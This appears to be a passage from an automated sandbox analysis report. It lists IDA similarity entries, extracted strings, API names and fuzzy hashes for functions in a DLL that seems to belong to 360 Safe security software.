                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc
                                                                                    • String ID: sqlite3_bind_blob$sqlite3_bind_int$sqlite3_bind_int64$sqlite3_bind_parameter_index$sqlite3_bind_text16$sqlite3_close$sqlite3_column_blob$sqlite3_column_bytes$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text16$sqlite3_exec$sqlite3_finalize$sqlite3_open16$sqlite3_prepare16_v2$sqlite3_reset$sqlite3_step
                                                                                    • API String ID: 190572456-2634604785
                                                                                    • Opcode ID: c6900063e6f1f58e840ab128dafbd2c95afe69325bb9c3ee8f7ad832e163feb1
                                                                                    • Instruction ID: 5824c6e44f34b1b970dc4f09c8d16c86c5da5fb83a6df47551891ccc5cd06f94
                                                                                    • Opcode Fuzzy Hash: c6900063e6f1f58e840ab128dafbd2c95afe69325bb9c3ee8f7ad832e163feb1
                                                                                    • Instruction Fuzzy Hash: D351A271201F4EA5EF968BA4E8913D833A1FB4CBD7F19D125A92D46364EF38C698C710
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$Clear$Init
                                                                                    • String ID: //root/config/item$install_first_open$name$pop_count$propoganda$tray_startup$update_first_open$value
                                                                                    • API String ID: 3740757921-2166998829
                                                                                    • Opcode ID: da0fe18e004557cc7b0f2f3d8356101b6c2bfabc220260c257d30514f78ba6f4
                                                                                    • Instruction ID: aff580d4b75deea64deb7e46e4065f56afbdc634fa72071d76af76b76e89fc57
                                                                                    • Opcode Fuzzy Hash: da0fe18e004557cc7b0f2f3d8356101b6c2bfabc220260c257d30514f78ba6f4
                                                                                    • Instruction Fuzzy Hash: CDB12A72705A09DAFB95CF65D8903EC27B0FB49B99F149421FA0EA3A64DF35CA48C340
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$CriticalSectionmemset$AppendPath$??3@CountEnterErrorFileFreeInitializeLastLeaveLibraryModuleNameSpin
                                                                                    • String ID: ..\deepscan\$360Safe$360util$QueryFileCancel$QueryFileClose$QueryFileCreate$QueryFilesEx2$QuerySetOption$cloudcom2.dll
                                                                                    • API String ID: 1015768321-2684063875
                                                                                    • Opcode ID: 75acf276f5303c209b0e6b56f5e71fa6dc54d5f9daca34d9052b038fe3a01ebd
                                                                                    • Instruction ID: 85df055bf9425c6c0da70963d94a526d831783e1f19dc8973dcfbc1a34099653
                                                                                    • Opcode Fuzzy Hash: 75acf276f5303c209b0e6b56f5e71fa6dc54d5f9daca34d9052b038fe3a01ebd
                                                                                    • Instruction Fuzzy Hash: B2818032301B8896EBA6DF21ED403D933A5FB497D4F548125EA5A0BBA4DF38D768C740
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$FreeLibraryOpenPathQueryValuememset$AddressAppendExistsFileHandleModuleProc
                                                                                    • String ID: Init$Path$SOFTWARE\360Safe\360Ent$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe$ServiceCall$\entclient\EntSvcCall_x64.dll
                                                                                    • API String ID: 1498439332-702965266
                                                                                    • Opcode ID: 7287dc7089829755e66462901955348d5673694c8cc533bc2c05e2a633cd80c9
                                                                                    • Instruction ID: 4281fb2f7f8363f35efb0fd70a638a071d20137889dcc292f685ea46b841f4e2
                                                                                    • Opcode Fuzzy Hash: 7287dc7089829755e66462901955348d5673694c8cc533bc2c05e2a633cd80c9
                                                                                    • Instruction Fuzzy Hash: 74513E32614B4996EF918F20E8557DA73A0F7897C4F549116BA9F06A79EF38C74CCB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: wcsstr$ExtensionFindPath_wcsicmp_wtoiwcschr
                                                                                    • String ID: CLSID$InprocHandler$InprocHandler32$InprocServer$InprocServer32$LocalServer$LocalServer32$Server$ShellExecute$\\?\$gfffffff$gfffffff
                                                                                    • API String ID: 3861457700-2318594275
                                                                                    • Opcode ID: 1a717cbbda8cc80c3c9297c878bbbc669d8a73a80a9fe28ac877bfe538569426
                                                                                    • Instruction ID: f5eaf3cd70d8a4233fc3eb4f5baabc932733307175318797ea3a634ab2d80fd0
                                                                                    • Opcode Fuzzy Hash: 1a717cbbda8cc80c3c9297c878bbbc669d8a73a80a9fe28ac877bfe538569426
                                                                                    • Instruction Fuzzy Hash: 3A12B672301A4886EB92DF39C8407DD23A1FB85BE5F44D211EA6D576E9EF78CA48C704
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountTick$Sleep
                                                                                    • String ID: ..\$..\cloudcom264.dll$..\deepscan\cloudcom264.dll$CreateObject
                                                                                    • API String ID: 4250438611-3269604003
                                                                                    • Opcode ID: b26729f86dd87614dde1f224353b88e55a5d4336fc5642cbf555589fae585a1a
                                                                                    • Instruction ID: 779814ae67fce754565a54a050c1806dc9f81f57e114568d0bd2b2f20499cc86
                                                                                    • Opcode Fuzzy Hash: b26729f86dd87614dde1f224353b88e55a5d4336fc5642cbf555589fae585a1a
                                                                                    • Instruction Fuzzy Hash: 0CC16D72301F4882EB969B29D84479D33B1F788BE4F458215FA2E437A5EF38CA49C740
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: memset$_wcsicmp$AppendCriticalPathSectionValue$EnterFileLeaveModuleName
                                                                                    • String ID: 360ExtHost$PCInfo$Partner$SOFTWARE\Wow6432Node\360EDRSensor$SOFTWARE\Wow6432Node\360EntSecurity$SOFTWARE\Wow6432Node\360SD$SOFTWARE\Wow6432Node\360Safe\Coop$ipartner$pid
                                                                                    • API String ID: 3226263223-3142758636
                                                                                    • Opcode ID: 628566989c82da212381fb3148179b37bd681cc2eaf5be604a1b5c7982e4b541
                                                                                    • Instruction ID: 9533c192c26b347b8b9675f8c4be5ba0e6f9fe9a3a5b632a6bc0f6ba07ebb3e1
                                                                                    • Opcode Fuzzy Hash: 628566989c82da212381fb3148179b37bd681cc2eaf5be604a1b5c7982e4b541
                                                                                    • Instruction Fuzzy Hash: CF419D31A00A0C94FB96DB22A8403D963A4F74DBE4F909225FD28677A5EF39C74EC340
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Count_cwprintf_s_lmemset$??3@Tickmemmove$??2@CriticalErrorHeapInitializeLastProcessSectionSpinrandsrand
                                                                                    • String ID: 0=%s$360safe$DomainQuery$[%s]$com$mid=%sm2=%sproduct=%scombo=%srule_group_id=%suv=%s$router$router:1
                                                                                    • API String ID: 1789426470-3446598425
                                                                                    • Opcode ID: 61786b1980ef7039dc4211af90e47e9a0e74f34993d56612bf85e9d061f4368c
                                                                                    • Instruction ID: 6d6f9855de1d8c5247af129e1c82467daf937bd8777ee679c9f2b2c93b700a4d
                                                                                    • Opcode Fuzzy Hash: 61786b1980ef7039dc4211af90e47e9a0e74f34993d56612bf85e9d061f4368c
                                                                                    • Instruction Fuzzy Hash: D8D19132204F4882EB419B69D8803DE73A0F789BE5F108226BAAD477E5DF78C649C704
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: wcscmp$Token$GlobalInformationProcess$AccountAllocCloseCurrentErrorFreeHandleLastLookupOpen
                                                                                    • String ID: LOCAL SERVICE$NETWORK SERVICE$NT AUTHORITY$SYSTEM
                                                                                    • API String ID: 3141378966-199577007
                                                                                    • Opcode ID: 8d6976f719ecb46038f7faa6d62441ad30095ab4bbf55d005c38fee77e3359ad
                                                                                    • Instruction ID: cee3605f7c7adaec53412b2e982fb153fefebb873c81ca2b5be3308eddbb09f0
                                                                                    • Opcode Fuzzy Hash: 8d6976f719ecb46038f7faa6d62441ad30095ab4bbf55d005c38fee77e3359ad
                                                                                    • Instruction Fuzzy Hash: F2517C32604B4986EBE28F14E8847DA73A5F78D7D8F518125EA5D436A4DF39C70DCB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: AppendPath$FileModule$Namememset$AttributesHandle
                                                                                    • String ID: ..\$..\deepscan\$bapi64.dll
                                                                                    • API String ID: 2144934147-2390674060
                                                                                    • Opcode ID: 9d5beebac642680a506550c8be48c190e39914ceb82cb04c52bb84f1375e2870
                                                                                    • Instruction ID: 18b05e09174244348b6cef7f8f2b1baf28e5037f203e247325d4c6a64b139c1b
                                                                                    • Opcode Fuzzy Hash: 9d5beebac642680a506550c8be48c190e39914ceb82cb04c52bb84f1375e2870
                                                                                    • Instruction Fuzzy Hash: 6F514B32614A8882FBA3DB20EC443DA3361F78D7C9F859125E59A47AA5EF2DC74DC740
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: _cwprintf_s_l$??3@CountHeapProcessStringTickmemmoverandsrand
                                                                                    • String ID: %d=%s$[%s]$com$mid=%sm2=%sproduct=%scombo=%srule_group_id=%suv=%spid=%s
                                                                                    • API String ID: 2740332460-2247268028
                                                                                    • Opcode ID: 48d86df3b5eac7e439a35ff4fd84f198e4b1e974b1358ce155bcc0297089f372
                                                                                    • Instruction ID: 80426b886386f52412969e15ba132e6e65bce95777886caa6ce0aa64614bcf94
                                                                                    • Opcode Fuzzy Hash: 48d86df3b5eac7e439a35ff4fd84f198e4b1e974b1358ce155bcc0297089f372
                                                                                    • Instruction Fuzzy Hash: 5FD1C172305F4886EB51DB29E88039E73A0FB88BE8F158625AE5D077A5DF78C549C704
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcsicmp_wcsnicmp$wcsstr
                                                                                    • String ID: Software\Classes\Wow6432Node$Software\Classes\Wow6432Node\$Software\Wow6432Node$Software\Wow6432Node\$Wow6432Node$Wow6432Node\$wow6432node
                                                                                    • API String ID: 4199785700-2224805171
                                                                                    • Opcode ID: bc25291bcc814f054e7e10840494f54f48fde9230fe93c8f0d5c0c6b2b3ad0be
                                                                                    • Instruction ID: 173969ce7e51924b4f06bf421c606f91b3afd6de77e358442d966ae2f37bd097
                                                                                    • Opcode Fuzzy Hash: bc25291bcc814f054e7e10840494f54f48fde9230fe93c8f0d5c0c6b2b3ad0be
                                                                                    • Instruction Fuzzy Hash: 55517371710E48C1EBA6DB29D8843B923A1B789BE4F46C215EA39437E4DF68CB4CC745
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: FilePath$AppendExistsModuleNamememset$CriticalSection$EnterLeave
                                                                                    • String ID: ..\360SkinMgr.exe$..\360sd.exe$..\safemon\360Cactus.tpi
                                                                                    • API String ID: 2738204422-1657815065
                                                                                    • Opcode ID: 78597d9bd975c32090d8355579ef8ffe821f8875940c9f43dd2c1350df723c28
                                                                                    • Instruction ID: 05d3995d6e5afe1b7f2ff7eb98ba3dbe6d41cc5d548c72c66593806649a32fef
                                                                                    • Opcode Fuzzy Hash: 78597d9bd975c32090d8355579ef8ffe821f8875940c9f43dd2c1350df723c28
                                                                                    • Instruction Fuzzy Hash: 0E417131614A8D82EBE69B21EC953EA27A4F79D784F80C055F99E476A5DF2DC30DCB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: AppendFileModuleNamePathmemset
                                                                                    • String ID: ..\360bps.dat$//lsp/fnp$//lsp/fnpw
                                                                                    • API String ID: 1620117007-629564897
                                                                                    • Opcode ID: 8b88fd5d987282aa7e8cbcbc9338ad7a6d43f93b19f4f5ae7e83081502dc9fb0
                                                                                    • Instruction ID: 9751cd454638bcc7bf23e097769634142843b259acdcdf6531404e40a8ce2858
                                                                                    • Opcode Fuzzy Hash: 8b88fd5d987282aa7e8cbcbc9338ad7a6d43f93b19f4f5ae7e83081502dc9fb0
                                                                                    • Instruction Fuzzy Hash: FF918431209B8882EAD2CF15E8847DDB7A4F7887D4F418116EA9943BA9DF7CC64DCB01
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalFileSection$EnterLeavefreemallocmemset$CloseCreateHandleReadSizeTime
                                                                                    • String ID: D063$|
                                                                                    • API String ID: 1613485820-3743183194
                                                                                    • Opcode ID: 180749bbb112b904ef6176165a202792b4826eb4bf0b5cc93a95b31eeb2a1677
                                                                                    • Instruction ID: 1c0486e52071ce2fa8a0c36d95268ac158065e3f2ce4ac4886627ad722c994ab
                                                                                    • Opcode Fuzzy Hash: 180749bbb112b904ef6176165a202792b4826eb4bf0b5cc93a95b31eeb2a1677
                                                                                    • Instruction Fuzzy Hash: 0A61AF327016588AFBD6CFA5E9457A873E9B70DBD8F008025EE0957BA8DF34C649C711
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: AppendPathmemset$CriticalFileModuleNameSectionValue_wcsicmp$EnterLeave
                                                                                    • String ID: Partner$PartnerName$SOFTWARE\Wow6432Node\360EDRSensor$SOFTWARE\Wow6432Node\360EntSecurity$SOFTWARE\Wow6432Node\360SD$SOFTWARE\Wow6432Node\360Safe\Coop$pid
                                                                                    • API String ID: 264253324-3445957450
                                                                                    • Opcode ID: af17b70cf5ba9092bea16f3f380d13b2d21a94489603b21e2ef55527860ed742
                                                                                    • Instruction ID: 89340431e1bc531ff063a600718ea9f8068e08b94321d1f6c16d494f9f8bead4
                                                                                    • Opcode Fuzzy Hash: af17b70cf5ba9092bea16f3f380d13b2d21a94489603b21e2ef55527860ed742
                                                                                    • Instruction Fuzzy Hash: 98319A32A00A4896FBA29F21AC443D967A0F74D7E4F808615FD68576E8DF79C78DC350
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: ??2@rand$??3@CountCriticalHeapInitializeProcessSectionTickmemsetsrand
                                                                                    • String ID: 360safe$WifiCheckQuery$http://%s/wcheckquery$wificheck$wificheck:1
                                                                                    • API String ID: 2719022499-1298750920
                                                                                    • Opcode ID: ba48bf925f8ff20436e767d0bb5c933ca5c9980a21313222aabcab8ee4652180
                                                                                    • Instruction ID: c937e0c4e90421d2c820d9f7251a3693a618876eb833e6d48c240cb9fefbc629
                                                                                    • Opcode Fuzzy Hash: ba48bf925f8ff20436e767d0bb5c933ca5c9980a21313222aabcab8ee4652180
                                                                                    • Instruction Fuzzy Hash: 31A19E72201F0891EA96DF29D8443DD33A0FB49BE8F558625EA6D077D1EF78C689C344
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
